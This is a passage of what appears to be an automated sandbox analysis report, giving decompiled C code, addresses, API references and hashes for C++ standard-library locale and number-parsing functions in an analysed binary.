								goto L33;
							}
							if( *((intOrPtr*)(_t214 + 4)) == _t170) {
								_t204 = _t214;
								E0043C83E(_t214);
							}
							_t212 =  *(_t214 + 6) & 0x0000ffff;
							_t189 = 0;
							_t171 = E0043B943(_t204, 0x78, 0,  *(_t215 - 0x60));
							_t217 = _t217 + 0xc;
							if(( *(_t214 + 6) & 0x0000ffff) == _t171) {
								L28:
								if( *(_t215 - 0x50) == _t189 ||  *(_t215 - 0x50) == 0x10) {
									 *(_t215 - 0x50) = 0x10;
									 *(_t215 - 0x58) = _t189;
									E0043C86E(_t214);
									goto L35;
								} else {
									goto L31;
								}
							} else {
								if( *((intOrPtr*)(_t214 + 4)) == 0) {
									_t204 = _t214;
									E0043C83E(_t214);
								}
								_t212 =  *(_t214 + 6) & 0x0000ffff;
								_t173 = E0043B943(_t204, 0x58, _t189,  *(_t215 - 0x60));
								_t217 = _t217 + 0xc;
								if(( *(_t214 + 6) & 0x0000ffff) != _t173) {
									goto L31;
								} else {
									goto L28;
								}
							}
						}
					}
				} else {
					if( *((intOrPtr*)(_t214 + 4)) == _t131) {
						_t193 = _t214;
						E0043C83E(_t214);
					}
					_t212 =  *(_t214 + 6) & 0x0000ffff;
					_t177 = E0043B943(_t193, 0x2b, 0,  *(_t215 - 0x60));
					_t217 = _t217 + 0xc;
					if(( *(_t214 + 6) & 0x0000ffff) != _t177) {
						__eflags =  *((char*)(_t214 + 4));
						if( *((char*)(_t214 + 4)) == 0) {
							_t193 = _t214;
							E0043C83E(_t214);
						}
						_t212 =  *(_t214 + 6) & 0x0000ffff;
						_t178 = E0043B943(_t193, 0x2d, 0,  *(_t215 - 0x60));
						_t217 = _t217 + 0xc;
						__eflags = ( *(_t214 + 6) & 0x0000ffff) - _t178;
						if(( *(_t214 + 6) & 0x0000ffff) != _t178) {
							goto L12;
						}
						_t179 =  *(_t215 - 0x64);
						 *_t179 = 0x2d;
						goto L11;
					} else {
						_t179 =  *(_t215 - 0x64);
						 *_t179 = 0x2b;
						L11:
						 *(_t215 - 0x54) = _t179 + 1;
						E0043C86E(_t214);
						goto L12;
					}
				}
			}

0x004427e0
0x004427e0
0x004427e7
0x004427ef
0x004427f2
0x004427f5
0x004427fb
0x00442801
0x00442807
0x0044280e
0x00442810
0x00442815
0x00442817
0x0044281d
0x00442821
0x00442826
0x00442826
0x00442829
0x00442831
0x00442834
0x00442837
0x0044283c
0x00442842
0x00442848
0x0044284a
0x0044284d
0x00442854
0x004428b8
0x004428bb
0x004428c5
0x004428d0
0x004428d5
0x004428e2
0x004428e4
0x004428e4
0x004428e7
0x004428d7
0x004428d7
0x004428d7
0x004428c7
0x004428c7
0x004428c7
0x004428ef
0x004428f3
0x004428f7
0x004428fe
0x004429aa
0x004429aa
0x004429ac
0x004429af
0x00000000
0x00000000
0x00000000
0x00442904
0x00442907
0x0044290b
0x0044290b
0x00442917
0x00000000
0x0044291d
0x0044291f
0x00442923
0x0044292b
0x0044292d
0x00442934
0x0044299c
0x0044299c
0x0044299e
0x004429a1
0x004429b1
0x004429b1
0x004429b5
0x004429cc
0x004429cc
0x004429d3
0x004429db
0x004429e2
0x004429e5
0x004429e9
0x004429f7
0x004429f9
0x004429fd
0x00442a07
0x00442af3
0x00442af7
0x00442afa
0x00442afc
0x00442afc
0x00442b03
0x00442b52
0x00442b55
0x00000000
0x00442b05
0x00442b05
0x00442b09
0x00442b0e
0x00000000
0x00000000
0x00442b10
0x00442b11
0x00442b24
0x00442b26
0x00442b38
0x00442b3c
0x00442b3e
0x00442b3e
0x00000000
0x00442b3c
0x00442b2c
0x00442b2f
0x00442b31
0x00442b31
0x00442b36
0x00000000
0x00000000
0x00000000
0x00000000
0x00442b36
0x00442b17
0x00442b1a
0x00442b1c
0x00442b1c
0x00442b22
0x00000000
0x00000000
0x00000000
0x00000000
0x00442b22
0x00442b41
0x00442b45
0x00442b4a
0x00442b4d
0x00442b4d
0x00442b58
0x00442b62
0x00442b65
0x00442b71
0x00442b7e
0x00442b7e
0x00000000
0x00000000
0x00000000
0x00442a0d
0x00442a0d
0x00442a11
0x00442a13
0x00442a15
0x00442a15
0x00442a22
0x00442a27
0x00442a2d
0x00442a38
0x00442a3d
0x00442a42
0x00442a83
0x00442a87
0x00442a8a
0x00442a8c
0x00442a8c
0x00442a8f
0x00442a93
0x00000000
0x00442a95
0x00442a95
0x00442a98
0x00442a9b
0x00000000
0x00000000
0x00442a9d
0x00442aa1
0x00442aa5
0x00442aa5
0x00442aaa
0x00442aae
0x00000000
0x00442ab0
0x00442ab7
0x00442abc
0x00442abc
0x00000000
0x00442abc
0x00442aae
0x00442a44
0x00442a48
0x00442a52
0x00442a55
0x00442a58
0x00442a58
0x00442a52
0x00442a60
0x00442a63
0x00442a67
0x00442a69
0x00442a69
0x00442a70
0x00442a76
0x00442a79
0x00442a7b
0x00442a7b
0x00442a7e
0x00442a7e
0x00442a70
0x00442abd
0x00442abf
0x00442ac7
0x00442ace
0x00442ad8
0x00442ade
0x00442ae1
0x00442ae3
0x00442ae3
0x00442aea
0x00442aef
0x00442aec
0x00442aec
0x00442aec
0x00442aea
0x00000000
0x00442ad8
0x004429b7
0x004429c7
0x00000000
0x004429c7
0x004429a3
0x00000000
0x004429a3
0x00442939
0x0044293b
0x0044293d
0x0044293d
0x00442945
0x00442949
0x0044294e
0x00442953
0x00442959
0x0044297e
0x00442981
0x0044298b
0x00442992
0x00442995
0x00000000
0x00000000
0x00000000
0x00000000
0x0044295b
0x0044295e
0x00442960
0x00442962
0x00442962
0x0044296a
0x00442971
0x00442976
0x0044297c
0x00000000
0x00000000
0x00000000
0x00000000
0x0044297c
0x00442959
0x00442917
0x00442856
0x00442859
0x0044285b
0x0044285d
0x0044285d
0x00442865
0x0044286d
0x00442872
0x00442878
0x00442882
0x00442886
0x00442888
0x0044288a
0x0044288a
0x00442892
0x0044289a
0x0044289f
0x004428a2
0x004428a5
0x00000000
0x00000000
0x004428a7
0x004428aa
0x00000000
0x0044287a
0x0044287a
0x0044287d
0x004428ad
0x004428b0
0x004428b3
0x00000000
0x004428b3
0x00442878

APIs

__EH_prolog3_GS.LIBCMT ref: 004427E7

Part of subcall function 0043DCE8: __EH_prolog3.LIBCMT ref: 0043DCEF
Part of subcall function 0043DCE8: std::_Lockit::_Lockit.LIBCPMT ref: 0043DCF9

_Maklocchr.LIBCPMT ref: 00442837
_Maklocchr.LIBCPMT ref: 0044286D
_Maklocchr.LIBCPMT ref: 0044289A
_Maklocchr.LIBCPMT ref: 0044294E
_Maklocchr.LIBCPMT ref: 00442971
_Maklocbyte.LIBCPMT ref: 00442A22

Strings

0123456789abcdefABCDEF, xrefs: 00442A33

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Maklocchr$H_prolog3H_prolog3_LockitLockit::_Maklocbytestd::_
String ID: 0123456789abcdefABCDEF
API String ID: 3273698008-3460774142
Opcode ID: b1aa12b68498e4d9712542d67829447d97fefca2f6f8faca3d11ecc896fe3d86
Instruction ID: 53773fe69d9c1fb2eb0623100d0c8e6044a9765df7f8166eca29cc0bb57caaba
Opcode Fuzzy Hash: b1aa12b68498e4d9712542d67829447d97fefca2f6f8faca3d11ecc896fe3d86
Instruction Fuzzy Hash: 1CC18E70E042988EEF25EFE4CA417AEBBB1AF15704F94401BE9417B282C7FC5985CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00441905 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 309
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00441905(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t128;
				signed short _t129;
				void* _t131;
				signed int _t133;
				signed int _t135;
				void* _t136;
				intOrPtr _t148;
				intOrPtr* _t149;
				void* _t151;
				void* _t153;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t161;
				intOrPtr _t162;
				void* _t170;
				void* _t171;
				void* _t173;
				void* _t177;
				void* _t178;
				signed int _t179;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t189;
				intOrPtr _t199;
				intOrPtr* _t209;
				intOrPtr _t211;
				intOrPtr _t214;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t218;

				_t218 = __eflags;
				_push(0x64);
				E00425719(E0044F8CB, __ebx, __edi, __esi);
				_t211 =  *((intOrPtr*)(_t215 + 8));
				_t214 =  *((intOrPtr*)(_t215 + 0x10));
				 *(_t215 - 0x64) =  *(_t215 + 0xc);
				 *((intOrPtr*)(_t215 - 0x5c)) =  *((intOrPtr*)(_t215 + 0x14));
				_push( *((intOrPtr*)(_t215 + 0x1c)));
				_t187 = E0043D800(__ebx, __edx, _t211, _t214, _t218);
				_t192 = _t187;
				E0043E9B7(_t187, _t215 - 0x48);
				_t128 = 0;
				 *((intOrPtr*)(_t215 - 4)) = 0;
				if( *((intOrPtr*)(_t215 - 0x38)) != 0) {
					_t192 = _t187;
					_t128 =  *((intOrPtr*)( *_t187 + 8))() & 0x0000ffff;
				}
				_t212 = _t211 + 8;
				 *(_t215 - 0x68) = _t128;
				 *(_t215 - 0x60) = _t211 + 8;
				_t129 = E0043B943(_t192, 0x30, 0, _t211 + 8);
				_t217 = _t216 + 0xc;
				_t188 = _t129 & 0x0000ffff;
				_t193 = _t214;
				 *(_t215 - 0x54) =  *(_t215 - 0x64);
				_t131 = E0043C897(_t214,  *((intOrPtr*)(_t215 - 0x5c)));
				if(_t131 != 0) {
					L12:
					_t133 =  *(_t215 + 0x18) & 0x00000e00;
					if(_t133 != 0x400) {
						__eflags = _t133 - 0x800;
						if(_t133 != 0x800) {
							asm("sbb eax, eax");
							_t135 =  ~_t133 & 0x0000000a;
							__eflags = _t135;
							 *(_t215 - 0x50) = _t135;
						} else {
							 *(_t215 - 0x50) = 0x10;
						}
					} else {
						 *(_t215 - 0x50) = 8;
					}
					 *(_t215 - 0x58) = 0;
					 *((char*)(_t215 - 0x49)) = 0;
					_t136 = E0043C897(_t214,  *((intOrPtr*)(_t215 - 0x5c)));
					if(_t136 != 0) {
						L33:
						_t189 = 0;
						__eflags =  *(_t215 - 0x50);
						if( *(_t215 - 0x50) == 0) {
							goto L36;
						}
						goto L34;
					} else {
						if( *((intOrPtr*)(_t214 + 4)) == _t136) {
							E0043C83E(_t214);
						}
						if(( *(_t214 + 6) & 0x0000ffff) != _t188) {
							goto L33;
						} else {
							 *(_t215 - 0x58) = 1;
							E0043C86E(_t214);
							_t204 = _t214;
							_t170 = E0043C897(_t214,  *((intOrPtr*)(_t215 - 0x5c)));
							if(_t170 != 0) {
								L31:
								_t189 = 0;
								__eflags =  *(_t215 - 0x50);
								if( *(_t215 - 0x50) != 0) {
									L34:
									__eflags =  *(_t215 - 0x50) - 0xa;
									if( *(_t215 - 0x50) == 0xa) {
										L36:
										 *((intOrPtr*)(_t215 - 0x6c)) = 0xa;
										L37:
										 *((intOrPtr*)(_t215 - 0x18)) = 0xf;
										 *(_t215 - 0x1c) = _t189;
										 *((char*)(_t215 - 0x2c)) = 0;
										E0040BFB0(_t215 - 0x2c, 1,  *(_t215 - 0x58));
										_t196 = _t214;
										 *((char*)(_t215 - 4)) = 1;
										 *((intOrPtr*)(_t215 - 0x70)) =  *(_t215 - 0x64) + 0x1f;
										if(E0043C897(_t214,  *((intOrPtr*)(_t215 - 0x5c))) != 0) {
											L66:
											_t209 =  *((intOrPtr*)(_t215 - 0x48));
											if( *((intOrPtr*)(_t215 - 0x34)) < 0x10) {
												_t209 = _t215 - 0x48;
											}
											if( *(_t215 - 0x58) == 0) {
												L83:
												 *(_t215 - 0x54) =  *(_t215 - 0x64);
												goto L84;
											} else {
												while(_t189 != 0) {
													_t199 =  *_t209;
													if(_t199 == 0x7f) {
														break;
													}
													_t189 = _t189 - 1;
													if(_t189 == 0) {
														L75:
														if(_t189 != 0) {
															L79:
															if( *((char*)(_t209 + 1)) > 0) {
																_t209 = _t209 + 1;
															}
															continue;
														}
														_t149 =  *((intOrPtr*)(_t215 - 0x2c));
														if( *((intOrPtr*)(_t215 - 0x18)) < 0x10) {
															_t149 = _t215 - 0x2c;
														}
														if(_t199 <  *_t149) {
															goto L83;
														} else {
															goto L79;
														}
													}
													_t148 =  *((intOrPtr*)(_t215 - 0x2c));
													if( *((intOrPtr*)(_t215 - 0x18)) < 0x10) {
														_t148 = _t215 - 0x2c;
													}
													if(_t199 !=  *((intOrPtr*)(_t148 + _t189))) {
														goto L83;
													} else {
														goto L75;
													}
												}
												__eflags =  *((char*)(_t215 - 0x49));
												if( *((char*)(_t215 - 0x49)) == 0) {
													 *(_t215 - 0x54) =  *(_t215 - 0x54) + 1;
													 *( *(_t215 - 0x54)) = 0x30;
												}
												L84:
												 *( *(_t215 - 0x54)) = 0;
												E00402E20(_t215 - 0x2c, 1, 0);
												E00402E20(_t215 - 0x48, 1, 0);
												return E00425763(_t189, _t212, _t214);
											}
										} else {
											goto L38;
										}
										do {
											L38:
											if( *((char*)(_t214 + 4)) == 0) {
												_t196 = _t214;
												E0043C83E(_t214);
											}
											_t151 = E0043C06C(_t196,  *(_t214 + 6) & 0x0000ffff,  *(_t215 - 0x60));
											_t212 =  *(_t215 - 0x54);
											 *_t212 = _t151;
											_t153 = E00423130("0123456789abcdefABCDEF", _t151,  *((intOrPtr*)(_t215 - 0x6c)));
											_t217 = _t217 + 0x14;
											if(_t153 == 0) {
												__eflags =  *((intOrPtr*)(_t215 - 0x18)) - 0x10;
												_t154 =  *((intOrPtr*)(_t215 - 0x2c));
												if( *((intOrPtr*)(_t215 - 0x18)) < 0x10) {
													_t154 = _t215 - 0x2c;
												}
												__eflags =  *((char*)(_t154 + _t189));
												if( *((char*)(_t154 + _t189)) == 0) {
													break;
												} else {
													_t212 =  *(_t215 - 0x68);
													__eflags = _t212;
													if(_t212 == 0) {
														break;
													}
													__eflags =  *((char*)(_t214 + 4));
													if( *((char*)(_t214 + 4)) == 0) {
														E0043C83E(_t214);
													}
													__eflags =  *(_t214 + 6) - _t212;
													if( *(_t214 + 6) != _t212) {
														break;
													} else {
														E00403B10(_t215 - 0x2c, 1, 0);
														_t189 = _t189 + 1;
														__eflags = _t189;
														goto L59;
													}
												}
											} else {
												if( *((char*)(_t215 - 0x49)) != 0 ||  *_t212 != 0x30) {
													if(_t212 <  *((intOrPtr*)(_t215 - 0x70))) {
														 *(_t215 - 0x54) = _t212;
														 *((char*)(_t215 - 0x49)) = 1;
													}
												}
												_t161 =  *((intOrPtr*)(_t215 - 0x2c));
												 *(_t215 - 0x58) = 1;
												if( *((intOrPtr*)(_t215 - 0x18)) < 0x10) {
													_t161 = _t215 - 0x2c;
												}
												if( *((char*)(_t161 + _t189)) != 0x7f) {
													_t162 =  *((intOrPtr*)(_t215 - 0x2c));
													if( *((intOrPtr*)(_t215 - 0x18)) < 0x10) {
														_t162 = _t215 - 0x2c;
													}
													 *((char*)(_t162 + _t189)) =  *((char*)(_t162 + _t189)) + 1;
												}
											}
											L59:
											E0043C86E(_t214);
											_t196 = _t214;
										} while (E0043C897(_t214,  *((intOrPtr*)(_t215 - 0x5c))) == 0);
										if(_t189 != 0) {
											_t155 =  *((intOrPtr*)(_t215 - 0x2c));
											if( *((intOrPtr*)(_t215 - 0x18)) < 0x10) {
												_t155 = _t215 - 0x2c;
											}
											if( *((char*)(_t155 + _t189)) <= 0) {
												 *(_t215 - 0x58) = 0;
											} else {
												_t189 = _t189 + 1;
											}
										}
										goto L66;
									}
									L35:
									 *((intOrPtr*)(_t215 - 0x6c)) = ((0 |  *(_t215 - 0x50) != 0x00000008) - 0x00000001 & 0xfffffff2) + 0x16;
									goto L37;
								}
								 *(_t215 - 0x50) = 8;
								goto L33;
							}
							if( *((intOrPtr*)(_t214 + 4)) == _t170) {
								_t204 = _t214;
								E0043C83E(_t214);
							}
							_t212 =  *(_t214 + 6) & 0x0000ffff;
							_t189 = 0;
							_t171 = E0043B943(_t204, 0x78, 0,  *(_t215 - 0x60));
							_t217 = _t217 + 0xc;
							if(( *(_t214 + 6) & 0x0000ffff) == _t171) {
								L28:
								if( *(_t215 - 0x50) == _t189 ||  *(_t215 - 0x50) == 0x10) {
									 *(_t215 - 0x50) = 0x10;
									 *(_t215 - 0x58) = _t189;
									E0043C86E(_t214);
									goto L35;
								} else {
									goto L31;
								}
							} else {
								if( *((intOrPtr*)(_t214 + 4)) == 0) {
									_t204 = _t214;
									E0043C83E(_t214);
								}
								_t212 =  *(_t214 + 6) & 0x0000ffff;
								_t173 = E0043B943(_t204, 0x58, _t189,  *(_t215 - 0x60));
								_t217 = _t217 + 0xc;
								if(( *(_t214 + 6) & 0x0000ffff) != _t173) {
									goto L31;
								} else {
									goto L28;
								}
							}
						}
					}
				} else {
					if( *((intOrPtr*)(_t214 + 4)) == _t131) {
						_t193 = _t214;
						E0043C83E(_t214);
					}
					_t212 =  *(_t214 + 6) & 0x0000ffff;
					_t177 = E0043B943(_t193, 0x2b, 0,  *(_t215 - 0x60));
					_t217 = _t217 + 0xc;
					if(( *(_t214 + 6) & 0x0000ffff) != _t177) {
						__eflags =  *((char*)(_t214 + 4));
						if( *((char*)(_t214 + 4)) == 0) {
							_t193 = _t214;
							E0043C83E(_t214);
						}
						_t212 =  *(_t214 + 6) & 0x0000ffff;
						_t178 = E0043B943(_t193, 0x2d, 0,  *(_t215 - 0x60));
						_t217 = _t217 + 0xc;
						__eflags = ( *(_t214 + 6) & 0x0000ffff) - _t178;
						if(( *(_t214 + 6) & 0x0000ffff) != _t178) {
							goto L12;
						}
						_t179 =  *(_t215 - 0x64);
						 *_t179 = 0x2d;
						goto L11;
					} else {
						_t179 =  *(_t215 - 0x64);
						 *_t179 = 0x2b;
						L11:
						 *(_t215 - 0x54) = _t179 + 1;
						E0043C86E(_t214);
						goto L12;
					}
				}
			}

0x00441905
0x00441905
0x0044190c
0x00441914
0x00441917
0x0044191a
0x00441920
0x00441926
0x0044192c
0x00441933
0x00441935
0x0044193a
0x0044193c
0x00441942
0x00441946
0x0044194b
0x0044194b
0x0044194e
0x00441956
0x00441959
0x0044195c
0x00441961
0x00441967
0x0044196d
0x0044196f
0x00441972
0x00441979
0x004419dd
0x004419e0
0x004419ea
0x004419f5
0x004419fa
0x00441a07
0x00441a09
0x00441a09
0x00441a0c
0x004419fc
0x004419fc
0x004419fc
0x004419ec
0x004419ec
0x004419ec
0x00441a14
0x00441a18
0x00441a1c
0x00441a23
0x00441acf
0x00441acf
0x00441ad1
0x00441ad4
0x00000000
0x00000000
0x00000000
0x00441a29
0x00441a2c
0x00441a30
0x00441a30
0x00441a3c
0x00000000
0x00441a42
0x00441a44
0x00441a48
0x00441a50
0x00441a52
0x00441a59
0x00441ac1
0x00441ac1
0x00441ac3
0x00441ac6
0x00441ad6
0x00441ad6
0x00441ada
0x00441af1
0x00441af1
0x00441af8
0x00441b00
0x00441b07
0x00441b0a
0x00441b0e
0x00441b1c
0x00441b1e
0x00441b22
0x00441b2c
0x00441c18
0x00441c1c
0x00441c1f
0x00441c21
0x00441c21
0x00441c28
0x00441c77
0x00441c7a
0x00000000
0x00441c2a
0x00441c2a
0x00441c2e
0x00441c33
0x00000000
0x00000000
0x00441c35
0x00441c36
0x00441c49
0x00441c4b
0x00441c5d
0x00441c61
0x00441c63
0x00441c63
0x00000000
0x00441c61
0x00441c51
0x00441c54
0x00441c56
0x00441c56
0x00441c5b
0x00000000
0x00000000
0x00000000
0x00000000
0x00441c5b
0x00441c3c
0x00441c3f
0x00441c41
0x00441c41
0x00441c47
0x00000000
0x00000000
0x00000000
0x00000000
0x00441c47
0x00441c66
0x00441c6a
0x00441c6f
0x00441c72
0x00441c72
0x00441c7d
0x00441c87
0x00441c8a
0x00441c96
0x00441ca3
0x00441ca3
0x00000000
0x00000000
0x00000000
0x00441b32
0x00441b32
0x00441b36
0x00441b38
0x00441b3a
0x00441b3a
0x00441b47
0x00441b4c
0x00441b52
0x00441b5d
0x00441b62
0x00441b67
0x00441ba8
0x00441bac
0x00441baf
0x00441bb1
0x00441bb1
0x00441bb4
0x00441bb8
0x00000000
0x00441bba
0x00441bba
0x00441bbd
0x00441bc0
0x00000000
0x00000000
0x00441bc2
0x00441bc6
0x00441bca
0x00441bca
0x00441bcf
0x00441bd3
0x00000000
0x00441bd5
0x00441bdc
0x00441be1
0x00441be1
0x00000000
0x00441be1
0x00441bd3
0x00441b69
0x00441b6d
0x00441b77
0x00441b7a
0x00441b7d
0x00441b7d
0x00441b77
0x00441b85
0x00441b88
0x00441b8c
0x00441b8e
0x00441b8e
0x00441b95
0x00441b9b
0x00441b9e
0x00441ba0
0x00441ba0
0x00441ba3
0x00441ba3
0x00441b95
0x00441be2
0x00441be4
0x00441bec
0x00441bf3
0x00441bfd
0x00441c03
0x00441c06
0x00441c08
0x00441c08
0x00441c0f
0x00441c14
0x00441c11
0x00441c11
0x00441c11
0x00441c0f
0x00000000
0x00441bfd
0x00441adc
0x00441aec
0x00000000
0x00441aec
0x00441ac8
0x00000000
0x00441ac8
0x00441a5e
0x00441a60
0x00441a62
0x00441a62
0x00441a6a
0x00441a6e
0x00441a73
0x00441a78
0x00441a7e
0x00441aa3
0x00441aa6
0x00441ab0
0x00441ab7
0x00441aba
0x00000000
0x00000000
0x00000000
0x00000000
0x00441a80
0x00441a83
0x00441a85
0x00441a87
0x00441a87
0x00441a8f
0x00441a96
0x00441a9b
0x00441aa1
0x00000000
0x00000000
0x00000000
0x00000000
0x00441aa1
0x00441a7e
0x00441a3c
0x0044197b
0x0044197e
0x00441980
0x00441982
0x00441982
0x0044198a
0x00441992
0x00441997
0x0044199d
0x004419a7
0x004419ab
0x004419ad
0x004419af
0x004419af
0x004419b7
0x004419bf
0x004419c4
0x004419c7
0x004419ca
0x00000000
0x00000000
0x004419cc
0x004419cf
0x00000000
0x0044199f
0x0044199f
0x004419a2
0x004419d2
0x004419d5
0x004419d8
0x00000000
0x004419d8
0x0044199d

APIs

__EH_prolog3_GS.LIBCMT ref: 0044190C

Part of subcall function 0043D800: __EH_prolog3.LIBCMT ref: 0043D807
Part of subcall function 0043D800: std::_Lockit::_Lockit.LIBCPMT ref: 0043D811

_Maklocchr.LIBCPMT ref: 0044195C
_Maklocchr.LIBCPMT ref: 00441992
_Maklocchr.LIBCPMT ref: 004419BF
_Maklocchr.LIBCPMT ref: 00441A73
_Maklocchr.LIBCPMT ref: 00441A96
_Maklocbyte.LIBCPMT ref: 00441B47

Strings

0123456789abcdefABCDEF, xrefs: 00441B58

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Maklocchr$H_prolog3H_prolog3_LockitLockit::_Maklocbytestd::_
String ID: 0123456789abcdefABCDEF
API String ID: 3273698008-3460774142
Opcode ID: 6a7b66ca3505e2f341aedf0f326c9d2fde68b2748fd08842fd398ba8e1610c85
Instruction ID: 012281645711172bf03d515209fce96504ee7c7b70b0c4776a9160a9da51ab64
Opcode Fuzzy Hash: 6a7b66ca3505e2f341aedf0f326c9d2fde68b2748fd08842fd398ba8e1610c85
Instruction Fuzzy Hash: E7C1AE70E043888EEF21DBE4C8817EEBBB1AF15304F14401BE5527B292D7BC5985CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00446396 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00446396(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x46460c; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E004452A6(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x46460c =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x00446396
0x0044639d
0x004463a7
0x004463ac
0x004463b2
0x004463bb
0x004463be
0x004463c3
0x004463c7
0x004463cc
0x004463d0
0x004463d4
0x004463da
0x004463e0
0x004463e1
0x004463e8
0x004463eb
0x004463f5
0x00446403
0x00446403
0x00446408
0x0044640d
0x00446413
0x00446419
0x004463d6
0x004463d6
0x004463d6
0x004463d4
0x0044641f
0x00446426
0x00446432

APIs

__EH_prolog3.LIBCMT ref: 0044639D
std::_Lockit::_Lockit.LIBCPMT ref: 004463A7

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

collate.LIBCPMT ref: 004463E1
std::bad_exception::bad_exception.LIBCMT ref: 004463F5
__CxxThrowException@8.LIBCMT ref: 00446403
std::locale::facet::_Facet_Register.LIBCPMT ref: 00446419

Strings

bad cast, xrefs: 004463ED
DFF, xrefs: 004463B6

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcollatestd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: DFF$bad cast
API String ID: 2346505839-3835943217
Opcode ID: 4e92c72b6e885c6f236a07c098748d8026953ec530ea47869aa18a58aa03baba
Instruction ID: 33d29ffbe4508595f6bf1f11175c281a40156f32aaf9b2945aa31ad28907dd2d
Opcode Fuzzy Hash: 4e92c72b6e885c6f236a07c098748d8026953ec530ea47869aa18a58aa03baba
Instruction Fuzzy Hash: 3C01A17190022597CF05EBA1D912AAE7334AF80724F64412FF5117B2E2DBBC99058BAE

Uniqueness

Uniqueness Score: -1.00%

Function 00446433 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E00446433(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x464610; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0044535D(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x464610 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x00446433
0x0044643a
0x00446444
0x00446449
0x0044644f
0x00446458
0x0044645b
0x00446460
0x00446464
0x00446469
0x0044646d
0x00446471
0x00446477
0x0044647d
